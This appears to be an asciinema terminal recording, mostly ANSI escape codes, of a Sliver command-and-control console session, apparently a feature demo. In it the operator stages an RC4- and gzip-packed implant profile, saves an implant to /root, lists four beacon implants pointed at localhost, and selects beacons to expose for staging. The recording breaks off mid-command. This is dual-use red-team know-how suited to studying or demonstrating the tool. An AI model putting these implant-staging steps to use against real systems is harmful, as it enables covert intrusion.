"\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[43.18097, "o", "\u001b[6n"] +[43.183315, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mgzip\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[43.183408, "o", "\u001b[214D\u001b[1A\u001b[39D\u001b[9C\u001b[214D\u001b[39C\u001b[?25h"] +[44.591398, "o", "\u001b[?25l\u001b[214D"] +[44.591978, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[44.596545, "o", "\u001b[6n"] +[44.605156, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mgzip \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[40D\u001b[9C"] +[44.606302, "o", "\u001b[214D\u001b[40C\u001b[?25h"] +[44.865304, "o", "\u001b[1 q"] +[44.897245, "o", "\u001b[1 q"] +[44.897427, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[44.899865, "o", "\u001b[6n"] +[44.90211, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mstage \u001b[1m\u001b[38;05;244m-r \u001b[39m\u001b[22m1234 \u001b[1m\u001b[38;05;244m-c \u001b[39m\u001b[22mgzip rubyc2profile \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[44.902336, "o", "\u001b[214D\u001b[1A\u001b[54D\u001b[9C\u001b[214D\u001b[54C\u001b[?25h"] +[45.436157, "o", "\u001b[54D\u001b[9C"] +[45.440133, "o", "\u001b[6n"] +[45.443079, "o", "\u001b[214D\u001b[54C\u001b[0J\u001b[214D\r\r\n"] +[45.445288, "o", "\u001b[0 q\r\n"] +[45.577603, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[45.681874, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[45.782396, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[45.885579, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[45.986132, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[46.08714, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[46.18743, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[46.289848, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[46.390349, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[46.492372, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[46.594606, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[46.69709, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[46.798081, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[46.898401, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[47.001454, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[47.101607, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[47.203255, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[47.304917, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[47.405417, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[47.506078, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[47.607601, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[47.709833, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[47.810699, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[47.910909, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[48.015307, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[48.115706, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[48.220213, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[48.321168, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[48.422196, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[48.522765, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[48.623496, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[48.724404, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[48.824842, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[48.925352, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[49.026214, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[49.1273, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[49.228199, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[49.329307, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[49.429953, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[49.530029, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[49.631032, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[49.732103, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[49.832921, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[49.933644, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[50.034987, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[50.136644, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[50.237435, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[50.337863, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[50.442481, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[50.545466, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[50.645986, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[50.747677, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[50.848029, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[50.948283, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[51.048818, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[51.150134, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[51.251111, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[51.351426, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[51.452974, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[51.553983, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[51.654684, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[51.755187, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[51.856145, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[51.956358, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[52.056496, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[52.156822, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[52.257951, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[52.359347, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[52.460568, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[52.56118, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[52.662128, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[52.762987, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[52.863501, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[52.96414, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[53.064639, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[53.165005, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[53.265296, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[53.366214, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[53.466537, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[53.567662, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[53.67063, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[53.770936, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[53.871563, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[53.972276, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[54.073042, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[54.173212, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[54.276139, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[54.377201, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[54.47762, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[54.579072, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[54.680074, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[54.781139, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[54.881576, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[54.98194, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[55.082628, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[55.187036, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[55.291563, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[55.394091, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[55.495358, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[55.596206, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[55.697138, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[55.798132, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[55.899013, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[55.99953, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[56.103424, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[56.204188, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[56.304793, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[56.405683, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[56.506455, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[56.607794, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[56.708681, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[56.809335, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[56.910137, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[57.010919, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[57.112135, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[57.212983, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[57.31805, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[57.419587, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[57.520196, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[57.621354, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[57.722075, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[57.824119, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[57.924599, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[58.024915, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[58.127674, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[58.228504, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[58.328925, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[58.43366, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[58.534214, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[58.634677, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[58.735292, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[58.836106, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[58.937398, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[59.040175, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[59.141358, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[59.245842, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[59.346404, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[59.447064, "o", "\r\u001b[2K ⠧ Compiling, please wait ..."] +[59.548633, "o", "\r\u001b[2K ⠇ Compiling, please wait ..."] +[59.649233, "o", "\r\u001b[2K ⠏ Compiling, please wait ..."] +[59.750301, "o", "\r\u001b[2K ⠋ Compiling, please wait ..."] +[59.853589, "o", "\r\u001b[2K ⠙ Compiling, please wait ..."] +[59.954108, "o", "\r\u001b[2K ⠹ Compiling, please wait ..."] +[60.054416, "o", "\r\u001b[2K ⠸ Compiling, please wait ..."] +[60.155014, "o", "\r\u001b[2K ⠼ Compiling, please wait ..."] +[60.2551, "o", "\r\u001b[2K ⠴ Compiling, please wait ..."] +[60.355831, "o", "\r\u001b[2K ⠦ Compiling, please wait ..."] +[60.374973, "o", "\r\u001b[2K"] +[60.388694, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /root/POWERFUL_DEBT\r\n\r\n"] +[60.397104, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[60.397628, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[60.399504, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[61.711194, "o", "\u001b[?25l"] +[61.713174, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[61.720317, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[61.817903, "o", "\u001b[?25l\u001b[214D"] +[61.8193, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[61.824286, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[61.998253, "o", "\u001b[?25l"] +[61.999296, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.001887, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[62.05207, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[62.052654, "o", "\u001b[6n"] +[62.055459, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[62.216191, "o", "\u001b[?25l"] +[62.218059, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.222114, "o", "impla\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C"] +[62.223295, "o", "\u001b[?25h"] +[62.358486, "o", "\u001b[?25l"] +[62.359097, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.364115, "o", "implan\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[62.60135, "o", "\u001b[?25l\u001b[214D"] +[62.603281, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.609081, "o", "implant\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[62.609883, "o", "\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[62.662166, "o", "\u001b[?25l\u001b[214D"] +[62.66417, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.666506, "o", "\u001b[1m\u001b[32mimplants\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[63.110464, "o", "\u001b[17D\u001b[9C"] +[63.117265, "o", "\u001b[6n"] +[63.121016, "o", "\u001b[214D\u001b[17C\u001b[0J"] +[63.121514, "o", "\u001b[214D\r\r\n"] +[63.123349, "o", "\u001b[0 q\r\n"] +[63.176883, "o", " Name Implant Type Template OS/Arch Format Command & Control Debug C2 Config ID Stage \r\n================== ===================== ========== ============= ============ ======================= ======= =========== ======= =======\r\n POWERFUL_DEBT gzip - RC4 - beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 54907 false \r\n SOFT_OWNER beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 42203 false \r\n VISITING_PERFUME zlib - beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 3383 false \r\n WHOLE_BASE RC4 - beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 20201 false \r\n"] +[63.177558, "o", "\r\n\r\n\r\n"] +[63.186065, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[63.186281, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[63.188074, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[63.188241, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[63.817359, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[63.829561, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[63.922034, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[63.934886, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[63.935128, "o", "\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[64.052777, "o", "\u001b[?25l"] +[64.053964, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[64.058012, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[64.058545, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[64.106408, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[64.113862, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[64.276508, "o", "\u001b[1 q"] +[64.30521, "o", "\u001b[1 q\u001b[?25l"] +[64.305698, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[64.309674, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[64.310154, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[64.756104, "o", "\u001b[?25l\u001b[214D"] +[64.75904, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[64.763904, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22ms\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[64.764861, "o", "\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[64.874575, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[64.88263, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22mst\u001b[0m\u001b[0K\u001b[49m\r"] +[64.887063, "o", "\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[65.01508, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[65.026543, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22msta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[21D\u001b[9C\u001b[214D\u001b[21C\u001b[?25h"] +[65.264178, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[65.264668, "o", "\u001b[6n"] +[65.26937, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22mstag\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[65.271044, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[22D\u001b[9C\u001b[214D\u001b[22C\u001b[?25h"] +[65.316151, "o", "\u001b[?25l\u001b[214D"] +[65.317287, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[65.319802, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22mstage\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[65.320572, "o", "\u001b[1A\u001b[23D\u001b[9C\u001b[214D\u001b[23C\u001b[?25h"] +[66.402281, "o", "\u001b[23D\u001b[9C\u001b[6n"] +[66.412449, "o", "\u001b[214D\u001b[23C\u001b[0J\u001b[214D\r\r\n"] +[66.414228, "o", "\u001b[0 q\r\n"] +[66.472399, "o", "\u001b7\u001b[?25l"] +[66.473469, "o", "\u001b8\u001b[0G\u001b[2K"] +[66.480895, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;1;99m [ ] \u001b[0m WHOLE_BASE\r\n \u001b[0;1;99m [ ] \u001b[0m VISITING_PERFUME\r\n \u001b[0;1;99m [ ] \u001b[0m POWERFUL_DEBT\r\n \u001b[0;1;99m [ ] \u001b[0m SOFT_OWNER\r\n"] +[66.481492, "o", "\u001b7"] +[66.482208, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[67.569931, "o", "\u001b8"] +[67.571104, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[67.576136, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;32m [x] \u001b[0m WHOLE_BASE\r\n \u001b[0;1;99m [ ] \u001b[0m VISITING_PERFUME\r\n \u001b[0;1;99m [ ] \u001b[0m POWERFUL_DEBT\r\n \u001b[0;1;99m [ ] \u001b[0m SOFT_OWNER\r\n\u001b7"] +[67.579232, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[67.927623, "o", "\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[67.937296, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m\r\n \u001b[0;32m [x] \u001b[0m WHOLE_BASE\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;1;99m [ ] \u001b[0m VISITING_PERFUME\r\n \u001b[0;1;99m [ ] \u001b[0m POWERFUL_DEBT\r\n \u001b[0;1;99m [ ] \u001b[0m SOFT_OWNER\r\n\u001b7"] +[67.93937, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[68.105907, "o", "\u001b8"] +[68.10758, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[68.109503, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m"] +[68.10963, "o", "\r\n \u001b[0;32m [x] \u001b[0m WHOLE_BASE\r\n \u001b[0;1;99m [ ] \u001b[0m VISITING_PERFUME\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;1;99m [ ] \u001b[0m POWERFUL_DEBT\r\n \u001b[0;1;99m [ ] \u001b[0m SOFT_OWNER\r\n\u001b7"] +[68.111334, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[68.371987, "o", "\u001b8"] +[68.378798, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[68.394306, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m \u001b[0;36m[Use arrows to move, space to select, to all, to none, type to filter]\u001b[0m\r\n \u001b[0;32m [x] \u001b[0m WHOLE_BASE\r\n \u001b[0;1;99m [ ] \u001b[0m VISITING_PERFUME\r\n\u001b[0;1;36m>\u001b[0m\u001b[0;32m [x] \u001b[0m POWERFUL_DEBT\r\n \u001b[0;1;99m [ ] \u001b[0m SOFT_OWNER\r\n\u001b7"] +[68.398433, "o", "\u001b[1A\u001b[0G\u001b[1A\u001b[0G"] +[68.858432, "o", "\u001b8\u001b[?25h\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect sessions and beacons to expose:\u001b[0m\u001b[0;36m WHOLE_BASE, POWERFUL_DEBT\u001b[0m\r\n"] +[68.897255, "o", "\r\n"] +[68.91368, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[68.914018, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[68.915454, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C"] +[68.91643, "o", "\u001b[214D\u001b[9C\u001b[?25h"] +[69.955405, "o", "\u001b[?25l"] +[69.956744, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[69.960494, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A"] +[69.96069, "o", "\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[70.009879, "o", "\u001b[?25l\u001b[214D"] +[70.012609, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[70.017804, "o", "im\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[70.018021, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[70.464456, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[70.483439, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[70.485924, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[70.539426, "o", "\u001b[?25l\u001b[214D"] +[70.540673, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[70.543898, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[70.544044, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D"] +[70.545525, "o", "\u001b[13C\u001b[?25h"] +[70.651461, "o", "\u001b[1 q"] +[70.683397, "o", "\u001b[1 q\u001b[?25l"] +[70.683609, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[70.687423, "o", "\u001b[1m\u001b[32mimplants \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[70.68846, "o", "\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[71.181819, "o", "\u001b[18D\u001b[9C\u001b[6n"] +[71.187391, "o", 